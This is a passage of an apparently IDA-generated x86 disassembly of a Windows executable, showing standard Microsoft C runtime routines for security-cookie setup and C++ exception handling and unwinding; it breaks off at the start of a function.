jb short loc_40B078
loc_40B087: ; CODE XREF: sub_40B066+10�j
pop edi
pop esi
retn
sub_40B066 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B08A proc near ; CODE XREF: J8@F_7_S:00404118�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push edi
mov edi, 0BB40E64Eh
cmp eax, edi
mov ebx, 0FFFF0000h
jz short loc_40B0BA
test eax, ebx
jz short loc_40B0BA
not eax
mov ds:dword_423068, eax
jmp short loc_40B11A
; ---------------------------------------------------------------------------
loc_40B0BA: ; CODE XREF: sub_40B08A+21�j
; sub_40B08A+25�j
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_41D1A0
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_41D194
xor esi, eax
call ds:dword_41D0E0
xor esi, eax
call ds:dword_41D108
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
cmp esi, edi
jnz short loc_40B100
mov esi, 0BB40E64Fh
jmp short loc_40B10B
; ---------------------------------------------------------------------------
loc_40B100: ; CODE XREF: sub_40B08A+6D�j
test esi, ebx
jnz short loc_40B10B
mov eax, esi
shl eax, 10h
or esi, eax
loc_40B10B: ; CODE XREF: sub_40B08A+74�j
; sub_40B08A+78�j
mov ds:dword_423064, esi
not esi
mov ds:dword_423068, esi
pop esi
loc_40B11A: ; CODE XREF: sub_40B08A+2E�j
pop edi
pop ebx
leave
retn
sub_40B08A endp
; =============== S U B R O U T I N E =======================================
sub_40B11E proc near ; DATA XREF: sub_40B18A�o
; J8@F_7_S:00423060�o ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
mov eax, [edi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B157
cmp dword ptr [eax+10h], 3
jnz short loc_40B157
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_40B152
cmp eax, 19930521h
jz short loc_40B152
cmp eax, 19930522h
jz short loc_40B152
cmp eax, 1994000h
jnz short loc_40B157
loc_40B152: ; CODE XREF: sub_40B11E+1D�j
; sub_40B11E+24�j ...
call sub_40BE59
loc_40B157: ; CODE XREF: sub_40B11E+D�j
; sub_40B11E+13�j ...
cmp ds:byte_426408, 0
push esi
jz short loc_40B183
push ds:dword_426404
call sub_405193
mov esi, eax
test esi, esi
pop ecx
jz short loc_40B183
push esi
call sub_4101B0
test eax, eax
pop ecx
jz short loc_40B183
push edi
call esi
jmp short loc_40B185
; ---------------------------------------------------------------------------
loc_40B183: ; CODE XREF: sub_40B11E+41�j
; sub_40B11E+53�j ...
xor eax, eax
loc_40B185: ; CODE XREF: sub_40B11E+63�j
pop esi
pop edi
retn 4
sub_40B11E endp
; =============== S U B R O U T I N E =======================================
sub_40B18A proc near ; DATA XREF: J8@F_7_S:0041D2D4�o
push offset sub_40B11E
call ds:dword_41D19C
push eax
call sub_405127
mov ds:dword_426404, eax
pop ecx
mov ds:byte_426408, 1
xor eax, eax
retn
sub_40B18A endp
; =============== S U B R O U T I N E =======================================
sub_40B1AB proc near ; DATA XREF: J8@F_7_S:0041D2F0�o
cmp ds:byte_426408, 0
jz short locret_40B1CE
push ds:dword_426404
call sub_405193
pop ecx
push eax
call ds:dword_41D19C
mov ds:byte_426408, 0
locret_40B1CE: ; CODE XREF: sub_40B1AB+7�j
retn
sub_40B1AB endp
; =============== S U B R O U T I N E =======================================
sub_40B1CF proc near ; DATA XREF: J8@F_7_S:004216E8�o
mov dword ptr [ecx], offset off_41DC24
jmp sub_402CCA
sub_40B1CF endp
; ---------------------------------------------------------------------------
loc_40B1DA: ; DATA XREF: J8@F_7_S:off_41DC24�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41DC24
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_40B1F6
push esi
call sub_402F6D
pop ecx
loc_40B1F6: ; CODE XREF: J8@F_7_S:0040B1ED�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40B1FC proc near ; CODE XREF: sub_40B43B+4E�p
; sub_40BA07+21A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_40B252
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_40B252
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_40B230
add ecx, 8
push ecx
push edx
call sub_407FD0
test eax, eax
pop ecx
pop ecx
jz short loc_40B230
loc_40B22C: ; CODE XREF: sub_40B1FC+3C�j
; sub_40B1FC+4B�j ...
xor eax, eax
jmp short loc_40B255
; ---------------------------------------------------------------------------
loc_40B230: ; CODE XREF: sub_40B1FC+1E�j
; sub_40B1FC+2E�j
test byte ptr [esi], 2
jz short loc_40B23A
test byte ptr [edi], 8
jz short loc_40B22C
loc_40B23A: ; CODE XREF: sub_40B1FC+37�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_40B249
test byte ptr [edi], 1
jz short loc_40B22C
loc_40B249: ; CODE XREF: sub_40B1FC+46�j
test al, 2
jz short loc_40B252
test byte ptr [edi], 2
jz short loc_40B22C
loc_40B252: ; CODE XREF: sub_40B1FC+B�j
; sub_40B1FC+13�j ...
xor eax, eax
inc eax
loc_40B255: ; CODE XREF: sub_40B1FC+32�j
pop edi
pop esi
retn
sub_40B1FC endp
; =============== S U B R O U T I N E =======================================
sub_40B258 proc near ; CODE XREF: sub_40B29C+85�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0E0434F4Dh
jz short loc_40B27F
cmp eax, 0E06D7363h
jnz short loc_40B299
call sub_40539D
and dword ptr [eax+90h], 0
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B27F: ; CODE XREF: sub_40B258+D�j
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short loc_40B299
call sub_40539D
add eax, 90h
dec dword ptr [eax]
loc_40B299: ; CODE XREF: sub_40B258+14�j
; sub_40B258+33�j
xor eax, eax
retn
sub_40B258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B29C proc near ; CODE XREF: sub_40B4FD+EC�p
; sub_40B8A9+36�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset dword_4215E0
call __SEH_prolog4
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
cmp dword ptr [edi+4], 80h
jg short loc_40B2BD
movsx esi, byte ptr [ebx+8]
jmp short loc_40B2C0
; ---------------------------------------------------------------------------
loc_40B2BD: ; CODE XREF: sub_40B29C+19�j
mov esi, [ebx+8]
loc_40B2C0: ; CODE XREF: sub_40B29C+1F�j
mov [ebp+var_1C], esi
call sub_40539D
add eax, 90h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
loc_40B2D3: ; CODE XREF: sub_40B29C+9F�j
cmp esi, [ebp+arg_C]
jz short loc_40B33D
cmp esi, 0FFFFFFFFh
jle short loc_40B2E2
cmp esi, [edi+4]
jl short loc_40B2E7
loc_40B2E2: ; CODE XREF: sub_40B29C+3F�j
call sub_40BEA5
loc_40B2E7: ; CODE XREF: sub_40B29C+44�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_40B318
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_40BEF0
loc_40B318: ; CODE XREF: sub_40B29C+65�j
and [ebp+ms_exc.disabled], 0
jmp short loc_40B338
; ---------------------------------------------------------------------------
loc_40B31E: ; DATA XREF: J8@F_7_S:00421600�o
push [ebp+ms_exc.exc_ptr]
call sub_40B258
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40B328: ; DATA XREF: J8@F_7_S:00421604�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_40B338: ; CODE XREF: sub_40B29C+80�j
mov [ebp+var_1C], esi
jmp short loc_40B2D3
; ---------------------------------------------------------------------------
loc_40B33D: ; CODE XREF: sub_40B29C+3A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40B362
cmp esi, [ebp+arg_C]
jz short loc_40B353
call sub_40BEA5
loc_40B353: ; CODE XREF: sub_40B29C+B0�j
mov [ebx+8], esi
call __SEH_epilog4
retn
sub_40B29C endp
; =============== S U B R O U T I N E =======================================
sub_40B35C proc near ; DATA XREF: J8@F_7_S:004215F8�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_40B35C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B362 proc near ; CODE XREF: sub_40B29C+A8�p
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short locret_40B37C
call sub_40539D
add eax, 90h
dec dword ptr [eax]
locret_40B37C: ; CODE XREF: sub_40B362+C�j
retn
sub_40B362 endp
; =============== S U B R O U T I N E =======================================
sub_40B37D proc near ; CODE XREF: sub_40B4FD+93�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B3BF
cmp dword ptr [eax+10h], 3
jnz short loc_40B3BF
mov ecx, [eax+14h]
cmp ecx, 19930520h
jz short loc_40B3A8
cmp ecx, 19930521h
jz short loc_40B3A8
cmp ecx, 19930522h
jnz short loc_40B3BF
loc_40B3A8: ; CODE XREF: sub_40B37D+19�j
; sub_40B37D+21�j
cmp dword ptr [eax+1Ch], 0
jnz short loc_40B3BF
call sub_40539D
xor ecx, ecx
inc ecx
mov [eax+20Ch], ecx
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40B3BF: ; CODE XREF: sub_40B37D+8�j
; sub_40B37D+E�j ...
xor eax, eax
retn
sub_40B37D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3C2 proc near ; CODE XREF: sub_406640+112�p
; sub_40B623+6E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421608
call __SEH_prolog4
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short loc_40B3FF
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40B3FF
mov eax, [ecx+1Ch]
test eax, eax
jz short loc_40B3FF
mov eax, [eax+4]
test eax, eax
jz short loc_40B3FF
and [ebp+ms_exc.disabled], 0
push eax
push dword ptr [ecx+18h]
call sub_404235
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40B3FF: ; CODE XREF: sub_40B3C2+11�j
; sub_40B3C2+19�j ...
call __SEH_epilog4
retn
sub_40B3C2 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40B416 proc near ; CODE XREF: sub_40B699+86�p
; sub_40B699+113�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [ecx]
push esi
mov esi, [esp+4+arg_0]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_40B439
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_40B439: ; CODE XREF: sub_40B416+11�j
pop esi
retn
sub_40B416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B43B proc near ; CODE XREF: sub_40BA07+111�p
; sub_40BA07+2AE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
test edi, edi
jnz short loc_40B44F
call sub_40BEA5
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B44F: ; CODE XREF: sub_40B43B+8�j
and [ebp+var_8], 0
cmp dword ptr [edi], 0
mov [ebp+var_1], 0
jle short loc_40B4AF
push ebx
push esi
loc_40B45E: ; CODE XREF: sub_40B43B+70�j
mov eax, [ebp+arg_0]
mov eax, [eax+1Ch]
mov eax, [eax+0Ch]
mov ebx, [eax]
test ebx, ebx
lea esi, [eax+4]
jle short loc_40B4A3
mov eax, [ebp+var_8]
shl eax, 4
mov [ebp+var_C], eax
loc_40B479: ; CODE XREF: sub_40B43B+60�j
mov ecx, [ebp+arg_0]
push dword ptr [ecx+1Ch]
mov eax, [esi]
push eax
mov eax, [edi+4]
add eax, [ebp+var_C]
push eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40B49F
dec ebx
add esi, 4
test ebx, ebx
jg short loc_40B479
jmp short loc_40B4A3
; ---------------------------------------------------------------------------
loc_40B49F: ; CODE XREF: sub_40B43B+58�j
mov [ebp+var_1], 1
loc_40B4A3: ; CODE XREF: sub_40B43B+33�j
; sub_40B43B+62�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [edi]
jl short loc_40B45E
pop esi
pop ebx
loc_40B4AF: ; CODE XREF: sub_40B43B+1F�j
mov al, [ebp+var_1]
leave
retn
sub_40B43B endp
; =============== S U B R O U T I N E =======================================
sub_40B4B4 proc near ; CODE XREF: sub_40BA07+30A�p
push 4
mov eax, offset loc_41C1EE
call sub_4045FF
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40B4D3
call sub_40BEA5
loc_40B4D3: ; CODE XREF: sub_40B4B4+18�j
and dword ptr [ebp-4], 0
call sub_40BE92
or dword ptr [ebp-4], 0FFFFFFFFh
jmp sub_40BE59
sub_40B4B4 endp
; =============== S U B R O U T I N E =======================================
sub_40B4E5 proc near ; DATA XREF: J8@F_7_S:00421630�o
call sub_40539D
mov ecx, [ebp+8]
push 0
push 0
mov [eax+94h], ecx
call sub_4041BB
int 3 ; Trap to Debugger
sub_40B4E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4FD proc near ; CODE XREF: sub_40B8A9+57�p
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0040B618 SIZE 00000005 BYTES
push 2Ch
push offset dword_421680
call __SEH_prolog4
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_34], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_3C]
push eax
call sub_4044D9
pop ecx
pop ecx
mov [ebp+var_28], eax
call sub_40539D
mov eax, [eax+88h]
mov [ebp+var_2C], eax
call sub_40539D
mov eax, [eax+8Ch]
mov [ebp+var_30], eax
call sub_40539D
mov [eax+88h], esi
call sub_40539D
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
and [ebp+ms_exc.disabled], 0
xor eax, eax
inc eax
mov [ebp+arg_8], eax
mov [ebp+ms_exc.disabled], eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_40456E
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp short loc_40B5FC
; ---------------------------------------------------------------------------
loc_40B58D: ; DATA XREF: J8@F_7_S:004216A0�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_40B37D
retn
; ---------------------------------------------------------------------------
loc_40B596: ; DATA XREF: J8@F_7_S:004216A4�o
mov esp, [ebp+ms_exc.old_esp]
call sub_40539D
and dword ptr [eax+20Ch], 0
mov esi, [ebp+arg_C]
mov edi, [ebp+arg_4]
cmp dword ptr [esi+4], 80h
jg short loc_40B5BA
movsx ecx, byte ptr [edi+8]
jmp short loc_40B5BD
; ---------------------------------------------------------------------------
loc_40B5BA: ; CODE XREF: sub_40B4FD+B5�j
mov ecx, [edi+8]
loc_40B5BD: ; CODE XREF: sub_40B4FD+BB�j
mov ebx, [esi+10h]
and [ebp+var_20], 0
loc_40B5C4: ; CODE XREF: sub_40B4FD+11E�j
mov eax, [ebp+var_20]
cmp eax, [esi+0Ch]
jnb short loc_40B5E4
imul eax, 14h
add eax, ebx
mov edx, [eax+4]
cmp ecx, edx
jle short loc_40B618
cmp ecx, [eax+8]
jg short loc_40B618
mov eax, [esi+8]
mov ecx, [eax+edx*8+8]
loc_40B5E4: ; CODE XREF: sub_40B4FD+CD�j
push ecx
push esi
push 0
push edi
call sub_40B29C
add esp, 10h
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
loc_40B5FC: ; CODE XREF: sub_40B4FD+8E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov [ebp+arg_8], 0
call sub_40B623
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40B4FD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B4FD
loc_40B618: ; CODE XREF: sub_40B4FD+D9�j
; sub_40B4FD+DE�j
inc [ebp+var_20]
jmp short loc_40B5C4
; END OF FUNCTION CHUNK FOR sub_40B4FD
; =============== S U B R O U T I N E =======================================
sub_40B61D proc near ; DATA XREF: J8@F_7_S:00421698�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_40B61D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B623 proc near ; CODE XREF: sub_40B4FD+10D�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-28h]
call sub_404522
pop ecx
call sub_40539D
mov ecx, [ebp-2Ch]
mov [eax+88h], ecx
call sub_40539D
mov ecx, [ebp-30h]
mov [eax+8Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_40B698
cmp dword ptr [esi+10h], 3
jnz short locret_40B698
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_40B674
cmp eax, 19930521h
jz short loc_40B674
cmp eax, 19930522h
jnz short locret_40B698
loc_40B674: ; CODE XREF: sub_40B623+41�j
; sub_40B623+48�j
cmp dword ptr [ebp-34h], 0
jnz short locret_40B698
cmp dword ptr [ebp-1Ch], 0
jz short locret_40B698
push dword ptr [esi+18h]
call sub_404501
pop ecx
test eax, eax
jz short locret_40B698
push dword ptr [ebp+10h]
push esi
call sub_40B3C2
pop ecx
pop ecx
locret_40B698: ; CODE XREF: sub_40B623+31�j
; sub_40B623+37�j ...
retn
sub_40B623 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B699 proc near ; CODE XREF: sub_40B818+36�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset dword_4216A8
call __SEH_prolog4
xor edx, edx
mov [ebp+var_1C], edx
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
cmp ecx, edx
jz loc_40B810
cmp [ecx+8], dl
jz loc_40B810
mov ecx, [eax+8]
cmp ecx, edx
jnz short loc_40B6D4
test dword ptr [eax], 80000000h
jz loc_40B810
loc_40B6D4: ; CODE XREF: sub_40B699+2D�j
mov eax, [eax]
mov esi, [ebp+arg_4]
test eax, eax
js short loc_40B6E1
lea esi, [ecx+esi+0Ch]
loc_40B6E1: ; CODE XREF: sub_40B699+42�j
mov [ebp+ms_exc.disabled], edx
xor ebx, ebx
inc ebx
push ebx
test al, 8
jz short loc_40B72D
mov edi, [ebp+arg_0]
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
mov eax, [edi+18h]
mov [esi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_40B71E: ; CODE XREF: sub_40B699+E7�j
push eax
call sub_40B416
pop ecx
pop ecx
mov [esi], eax
jmp loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B72D: ; CODE XREF: sub_40B699+51�j
mov edi, [ebp+arg_C]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
test [edi], bl
jz short loc_40B782
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push dword ptr [edi+14h]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push esi
call sub_407370
add esp, 0Ch
cmp dword ptr [edi+14h], 4
jnz loc_40B7F8
mov eax, [esi]
test eax, eax
jz short loc_40B7F8
add edi, 8
push edi
jmp short loc_40B71E
; ---------------------------------------------------------------------------
loc_40B782: ; CODE XREF: sub_40B699+9F�j
cmp [edi+18h], edx
jnz short loc_40B7BF
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+14h]
add edi, 8
push edi
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push esi
call sub_407370
add esp, 0Ch
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7BF: ; CODE XREF: sub_40B699+EC�j
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
test eax, eax
jz short loc_40B7F3
test byte ptr [edi], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_1C], eax
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7F3: ; CODE XREF: sub_40B699+62�j
; sub_40B699+73�j ...
call sub_40BEA5
loc_40B7F8: ; CODE XREF: sub_40B699+8F�j
; sub_40B699+D7�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
jmp short loc_40B812
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B810: ; CODE XREF: sub_40B699+19�j
; sub_40B699+22�j ...
xor eax, eax
loc_40B812: ; CODE XREF: sub_40B699+169�j
call __SEH_epilog4
retn
sub_40B699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B818 proc near ; CODE XREF: sub_40B8A9+11�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 8
push offset dword_4216C8
call __SEH_prolog4
mov eax, [ebp+arg_8]
test dword ptr [eax], 80000000h
jz short loc_40B834
mov ebx, [ebp+arg_4]
jmp short loc_40B83E
; ---------------------------------------------------------------------------
loc_40B834: ; CODE XREF: sub_40B818+15�j
mov ecx, [eax+8]
mov edx, [ebp+arg_4]
lea ebx, [ecx+edx+0Ch]
loc_40B83E: ; CODE XREF: sub_40B818+1A�j
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_C]
push esi
push eax
push [ebp+arg_4]
mov edi, [ebp+arg_0]
push edi
call sub_40B699
add esp, 10h
dec eax
jz short loc_40B878
dec eax
jnz short loc_40B890
push 1
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
jmp short loc_40B890
; ---------------------------------------------------------------------------
loc_40B878: ; CODE XREF: sub_40B818+3F�j
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
loc_40B890: ; CODE XREF: sub_40B818+42�j
; sub_40B818+5E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call __SEH_epilog4
retn
sub_40B818 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8A9 proc near ; CODE XREF: sub_40B915+D4�p
; sub_40BA07+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
cmp [ebp+arg_10], 0
jz short loc_40B8C2
push [ebp+arg_10]
push ebx
push esi
push [ebp+arg_0]
call sub_40B818
add esp, 10h
loc_40B8C2: ; CODE XREF: sub_40B8A9+7�j
cmp [ebp+arg_18], 0
push [ebp+arg_0]
jnz short loc_40B8CE
push esi
jmp short loc_40B8D1
; ---------------------------------------------------------------------------
loc_40B8CE: ; CODE XREF: sub_40B8A9+20�j
push [ebp+arg_18]
loc_40B8D1: ; CODE XREF: sub_40B8A9+23�j
call sub_40423C
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_40B29C
mov eax, [edi+4]
push 100h
push [ebp+arg_14]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_40B4FD
add esp, 28h
test eax, eax
jz short loc_40B913
push esi
push eax
call sub_404205
loc_40B913: ; CODE XREF: sub_40B8A9+61�j
pop ebp
retn
sub_40B8A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B915 proc near ; CODE XREF: sub_40BA07+336�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_40BA04
push edi
call sub_40539D
cmp dword ptr [eax+80h], 0
jz short loc_40B978
call sub_40539D
lea edi, [eax+80h]
call sub_40518A
cmp [edi], eax
jz short loc_40B978
cmp dword ptr [esi], 0E0434F4Dh
jz short loc_40B978
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4042F4
add esp, 1Ch
test eax, eax
jnz loc_40BA03
loc_40B978: ; CODE XREF: sub_40B915+22�j
; sub_40B915+36�j ...
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jnz short loc_40B986
call sub_40BEA5
loc_40B986: ; CODE XREF: sub_40B915+6A�j
mov esi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push edi
call sub_404466
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_40BA03
push ebx
loc_40B9A9: ; CODE XREF: sub_40B915+EB�j
cmp esi, [edi]
jl short loc_40B9F4
cmp esi, [edi+4]
jg short loc_40B9F4
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_40B9CA
cmp byte ptr [ecx+8], 0
jnz short loc_40B9F4
loc_40B9CA: ; CODE XREF: sub_40B915+AD�j
lea ebx, [eax-10h]
test byte ptr [ebx], 40h
jnz short loc_40B9F4
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_40B8A9
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_40B9F4: ; CODE XREF: sub_40B915+96�j
; sub_40B915+9B�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_40B9A9
pop ebx
loc_40BA03: ; CODE XREF: sub_40B915+5D�j
; sub_40B915+91�j
pop edi
loc_40BA04: ; CODE XREF: sub_40B915+F�j
pop esi
leave
retn
sub_40B915 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA07 proc near ; CODE XREF: sub_40BD75+D4�p
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
